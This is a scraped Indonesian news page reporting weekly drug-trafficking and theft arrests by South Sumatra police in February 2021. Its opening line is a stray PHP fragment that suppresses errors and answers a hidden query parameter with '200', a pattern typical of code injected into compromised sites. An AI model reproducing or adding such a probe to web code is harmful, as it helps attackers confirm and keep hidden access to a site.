error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} 39 PENGEDAR NARKOBA DITANGKAP DIT RES NARKOBA DAN SAT RES NARKOBA POLRES JAJARAN POLDA SUMSEL PADA MINGGU KEDUA FEBRUARI 2021 - SMI.COM

Home / KRIMINAL / SUMSEL

Senin, 15 Februari 2021 - 12:01 WIB

39 PENGEDAR NARKOBA DITANGKAP DIT RES NARKOBA DAN SAT RES NARKOBA POLRES JAJARAN POLDA SUMSEL PADA MINGGU KEDUA FEBRUARI 2021

39 PENGEDAR NARKOBA DITANGKAP DIT RES NARKOBA DAN
SAT RES NARKOBA POLRES JAJARAN POLDA SUMSEL
PADA MINGGU KEDUA FEBRUARI 2021

39 PENGEDAR NARKOBA DITANGKAP DIT RES NARKOBA DAN SAT RES NARKOBA POLRES JAJARAN POLDA SUMSEL PADA MINGGU KEDUA FEBRUARI 2021

SUMSEL, SMI-

Walaupun masa Pandemi Covid-19, Dit Res Narkoba dan Dit Reskrimum Polda Sumsel serta Polres dan Polrestabes Jajaran masih melakukan pengungkapan terhadap kasus-kasus yang terjadi khususnya Kasus 3C (Curas, Curat dan Curanmor) dan Tindak Pidana Narkoba demikian ungkap Kabid Humas Kombes Pol Drs Supriadi, MM diruang kejranya pada hari senin 15 Februari 2021.

Ini dibuktikan pada minggu Kedua Bulan Februari 2021 Dit Res Narkoba Polda Sumsel dan Polres dan Polrestabes jajaran berhasil mengungkap kasus sebanyak 40 Kasus dan menangkap sebanyak 43 Tersangka, dari 43 tersangka tersebut terdiri dari pengedar 39 Orang, pemakai 4 Orang.

Sedangkan Barang bukti yang disita sebanyak Shabu 25.441,37 gram, Ganja 10,69 gram, Ekstasi 1150 1/2 Butir.

Dari segi kuantitas urutan Laporan Polisi (LP) terbanyak yakni Polres OKI (5).Ditresnarkoba Polda Sumsel (3) Polres Banyu Asin (3), Polres OKUT (3). Polres Mura (3). Polres Pali (3).dan Polres Muratara (3).

Baca Juga :  DPD KAI SUMSEL GELAR UKDPA

Dari segi kualitas urutan Barang Bukti (BB) terbanyak yakni Ditresnarkoba Polda Sumsel 25103,73 gram shabu, Polrestabes Palembang 107,08 gram shabu dan 800 butir ektasi, Polres Banyuasin 4,3 gram shabu dan 100 butir ektasi, Polres Mura 3,2 gram shabu dan 200 butir ektasi.

Dari Barang Bukti Narkoba Yang Disita (Shabu, Ganja, Ekstasi) Maka Dit Res Narkoba Polda Sumsel telah berhasil Menyelamatkan sebanyak 155.002 Anak Bangsa dari bahaya penyalahgunaan narkoba tegas Kabid Humas.

Sedangkan Dit Reskrimum Polda Sumsel dan Polres/ tabes jajaran pada Minggu kedua Bulan Februari berhasil mengungkap sebanyak 19 kasus tindak pidana.

Dari 19 Kasus tindak pidana yang terungkap oleh Ditreskrimum Polda Sumsel dan Polres dan Polrestabes jajaran tersebut terdiri dari beberapa kasus yaitu : Curat 14 kasus, Curas 3 Kasus, curanmor 1 kasus, dan Anirat 1 kasus.

Baca Juga :  Polda Riau Ukir Prestasi, 20 Ton di Amankan

Sedangkan yang terbanyak mengungkap adalah Polres OKU Selatan 4 kasus, Dit Reskrimum 3 Kasus, Polres OI 3, sedangkan, Polres Muara Enim 2 kasus, Musi Banyuasin 1, Polres OKU 1 kasus, Polres OKU Timur 1 Kasus,Polres Prabumulih 1 kasus, Polres Pali 1 kasus, Polres Pagar Alam dan Polres Empat Lawang 1 Kasus.

Kombes Pol Drs Supriadi, MM menghimbau kepada masyarakat Propinsi Sumsel agar menjauhi narkoba karena merusak kesehatan bahkan bisa mengakibatkan kematian. Awasi anak dan keluarga ketika keluar rumah maupun didalam rumah supaya terhindar dari bahaya narkob, imbaunya.

Untuk menekan dan mengurangi terjadinya tindak pidana 3C di Propinsi Sumsel maka pemilik mobil dan motor agar menambah kunci pengaman, apabila sedang berpergian kunci pintu dan jendela rumah serta masyarakat bisa menjaga keamanan terhadap diri sendiri dan lingkungannya,harapnya.

Share :

Baca Juga

HOTEL & DESTINASI WISATA

Ulak Lia Coffe Shop Grand Ranggonang Semakin Menarik

MUSI BANYUASIN

10 Juni 2019 ASN Harus Masuk Kerja

MUSI BANYUASIN

Miliki Senjata API, Oknum ASN Di Amankan

MUSI BANYUASIN

Kunker Tim Wasev Sterad Dalam Rangka Kegiatan Komsos Semester II TA. 2022 Di Kodim 0401/Muba

MUSI BANYUASIN

memperingati Hari Peduli Sampah Nasional (HPSN) DLH Muba Buat Acara Gerebek Sampah

MUSI BANYUASIN

3 Desa Ikuti Pembekalan Pokja  Pendataan

PALEMBANG

Polda Sumsel Bersama Bupati dan Polres Banyuasin Melaksanakan Tebar Benih Ikan dan Peresmian Pos Pengasuh Serta Perpustakaan

PALEMBANG

Bupati Banyuasin Askolani Melalui Tim Kuasa Hukum Membantah Laporan Yang Dituduhkan Kepada Klien Tidak Benar